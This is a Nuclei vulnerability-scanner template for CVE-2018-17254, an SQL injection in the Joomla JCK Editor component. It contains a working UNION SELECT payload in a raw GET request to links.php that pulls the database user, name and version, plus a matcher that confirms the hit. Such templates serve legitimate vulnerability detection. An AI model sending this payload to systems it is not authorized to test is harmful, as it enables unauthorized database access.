nuclei-templates/cves/2018/CVE-2018-17254.yaml

25 lines
867 B
YAML

id: CVE-2018-17254
info:
name: Joomla JCK Editor SQL Injection
author: Suman_Kar
description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
severity: high
tags: joomla,sqli,cve,cve2018
reference:
- http://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html
- https://www.exploit-db.com/exploits/45423/
requests:
- raw:
- |
GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}
matchers:
- type: word
part: body
words:
- "nuclei-template"